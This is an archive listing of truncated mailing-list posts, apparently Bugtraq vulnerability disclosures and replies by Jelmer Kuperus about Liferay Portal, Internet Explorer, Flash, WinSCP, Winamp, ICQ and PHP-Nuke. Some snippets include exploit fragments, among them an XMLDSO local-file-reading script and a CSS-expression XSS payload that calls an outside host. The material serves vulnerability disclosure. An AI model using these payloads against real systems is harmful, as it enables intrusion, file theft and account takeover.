Guests can view names and email addresses of all Liferay users in Liferay 6.1

2012-05-15 Thread Jelmer Kuperus
Guests can view names and email addresses of all Liferay users in Liferay 6.1 Description: Liferay Portal is an enterprise portal written in Java. As an unauthenticated user it is possible to retrieve the names and email addresses of all Liferay users. To retrieve a list of all users simply issue

Liferay 6.1 can be compromised without having an account on the portal

2012-05-15 Thread Jelmer Kuperus
Liferay 6.1 can be compromised without having an account on the portal Description: Liferay Portal is an enterprise portal written in Java. Liferay in its default configuration exposes a number of remotely accessible webservices. Access to these services is restricted by an IP block. It is

Liferay users can assign themselves to organizations, leading to possible privilege escalation

2012-05-14 Thread Jelmer Kuperus
Liferay users can assign themselves to organizations, leading to possible privilege escalation Description: Liferay Portal is an enterprise portal written in Java. Due to insufficient permission checking in the updateOrganizations method of UserService any user can assign him or herself to any

Specially crafted Json service request allows full control over a Liferay portal instance

2012-04-20 Thread Jelmer Kuperus
Specially crafted Json service request allows full control over a Liferay portal instance Description: Liferay Portal is an enterprise portal written in Java. By doing a single HTTP request you can reconfigure Liferay to use a remote Memcached cache instead of its own cache.

Liferay 6.1 can be compromised in its default configuration

2012-04-20 Thread Jelmer Kuperus
Liferay 6.1 can be compromised in its default configuration Description: Liferay Portal is an enterprise portal written in Java. By utilizing the json webservices exposed by the platform you can register a new user with any role in the system, including the built-in administrator role. The

Specially crafted webdav request allows reading of local files on Liferay 6.0.x

2012-04-20 Thread Jelmer Kuperus
Specially crafted webdav request allows reading of local files on Liferay 6.0.x Description: Liferay Portal is an enterprise portal written in Java. By creating a specially crafted webdav request that contains an external entity it is possible to read files from a Liferay server and echo these

WinSCP - URI Handler Command Switch Parsing

2006-06-12 Thread Jelmer Kuperus
WinSCP - URI Handler Command Switch Parsing About winscp : WinSCP is an open source freeware SFTP client for Windows using SSH. Legacy SCP protocol is also supported. Its main function is safe copying of files between a local and a remote computer. Versions affected : It was tested on WinSCP

Re: IE - reading local files

2003-03-24 Thread jelmer
I don't know if anybody pointed it out before... yes i did, see http://msgs.securepoint.com/cgi-bin/get/bugtraq0302/12.html - Original Message - From: Adam [ckkl] [EMAIL PROTECTED] To: [EMAIL PROTECTED] Sent: Sunday, March 23, 2003 3:10 AM Subject: IE - reading local files Hello,

internet explorer local file reading

2003-02-05 Thread jelmer
We already knew pressing the back button on IE is dangerous (http://online.securityfocus.com/archive/1/267561). So it won't come as a total shock that so is clicking a link :) The problem lies in the dragdrop method that was added as a method on nearly all HTML elements in IE 5.5. This method makes

Re: How to execute programs with parameters in IE - Sandblad advisory #10

2002-11-08 Thread jelmer
method caching bugs. Very nice work indeed. I'll cc this to bugtraq for clarity's sake -- jelmer - Original Message - From: Andreas Sandblad [EMAIL PROTECTED] To: jelmer [EMAIL PROTECTED] Sent: Friday, November 08, 2002 4:34 PM Subject: Re: How to execute programs with parameters in IE

Re: Vulnerable cached objects in IE (9 advisories in 1)

2002-10-22 Thread jelmer
The external method flaw also seems to affect my IE6 SP1 browser -- jelmer - Original Message - From: GreyMagic Software [EMAIL PROTECTED] To: Bugtraq [EMAIL PROTECTED] Sent: Tuesday, October 22, 2002 5:24 PM Subject: Vulnerable cached objects in IE (9 advisories in 1) GreyMagic

Re: MSIE:SaveRef cracks (VictimWindow).document.write

2002-10-21 Thread jelmer
It throws a permission denied exception on my MSIE 6 SP1 + all patches in place MSIE 6.0.2600. is way old -- jelmer - Original Message - From: Liu Die Yu [EMAIL PROTECTED] To: [EMAIL PROTECTED] Sent: Monday, October 21, 2002 4:16 PM Subject: MSIE:SaveRef cracks (VictimWindow

Flash player can read local files

2002-10-07 Thread jelmer
The following message apparently bounced the first time I sent it :s Flash player can read local files Description: There is a flaw in the Macromedia Flash player which allows reading and sending of local files. The flaw lies in the fact that when a Flash movie is loaded from a remote SMB share

Re: MSIEv6 % encoding causes a problem again

2002-09-04 Thread jelmer
the content is under your control. Thus you can create fake login screens etc without raising suspicion -- jelmer - Original Message - From: Dave Ahmad [EMAIL PROTECTED] To: Liu Die Yu [EMAIL PROTECTED] Sent: Wednesday, September 04, 2002 6:32 PM Subject: Re: MSIEv6 % encoding causes

Re: Internet explorer can read local files

2002-08-19 Thread Jelmer
) { } } /script - Original Message - From: Avleen Vig [EMAIL PROTECTED] To: Jelmer [EMAIL PROTECTED] Cc: [EMAIL PROTECTED] Sent: Saturday, August 17, 2002 8:31 PM Subject: Re: Internet explorer can read local files On Sat, 17 Aug 2002, Jelmer wrote: html head base href=file

Internet explorer can read local files

2002-08-17 Thread Jelmer
:\jelmer.xml html head base href=file:///C:/ /head body applet code=com.ms.xml.dso.XMLDSO.class width=100% height=50 id=xmldso MAYSCRIPT=true PARAM NAME=url VALUE=jelmer.xml /applet script language=javascript setTimeout(showIt(),2000); function showIt() { var jelmer = xmldso.getDocument

Enabling Java logging in MSIE is dangerous

2002-08-17 Thread Jelmer
\javalog.txt Those who have been following HTTP-EQUIV's discovery will realise that this is extremely dangerous, as it will allow execution of arbitrary code. However, since this feature is disabled by default it can be considered to be very low risk -- jelmer

RETRY : newly released winamp 3 fails to address serious execution of arbitrary code issue when combined with MSIE6

2002-08-17 Thread Jelmer
This one was missed by security focus. Let's try again -- jelmer - Original Message - From: Jelmer [EMAIL PROTECTED] To: [EMAIL PROTECTED] Sent: Sunday, August 11, 2002 1:28 AM Subject: newly released winamp 3 fails to address serious execution of arbitrary code issue when combined

Re: PHP-Nuke v5.6 - Users can compromise admin accts.

2002-08-16 Thread Jelmer
='http://kuperus.xs4all.nl' : 0 ); word-wrap : expression(this.done=true); test/a It's a bit messy but gets the job done. It works by using CSS expressions (a feature afaik native to Internet Explorer) in the style tag. -- jelmer - Original Message - From: -delusion- [EMAIL PROTECTED

Macromedia Flash plugin can read local files

2002-08-08 Thread Jelmer
Macromedia Flash plugin can read local files Description : Macromedia

Re: Winhelp32 Remote Buffer Overrun

2002-08-01 Thread Jelmer
several months and as far as I know they are still looking. -- jelmer - Original Message - From: Next Generation Insight Security Research Team [EMAIL PROTECTED] To: [EMAIL PROTECTED]; [EMAIL PROTECTED] Sent: Friday, August 02, 2002 3:59 AM Subject: Winhelp32 Remote Buffer Overrun -BEGIN

WINAMP also allows execution of arbitrary code (probably a lot more programs as well)

2002-07-18 Thread Jelmer
It would seem that I opened up a can of worms when I created my ICQ + MSIE advisory the other day, which presented a new way to execute arbitrary code on a user's machine. Winamp is equally vulnerable. Winamp starts skin files with the extension wsz and the mime type interface/x-winamp-skin

ICQ and MSIE allow execution of arbitrary code

2002-07-16 Thread Jelmer
Outline quote I was about to put on a home page right after I discovered it [and still had a hope that I will be that one who will finally destroy the world :]: /quote Well I don't know if it will destroy the world, but sure enough it's enough to destroy a small portion of it :) Actually I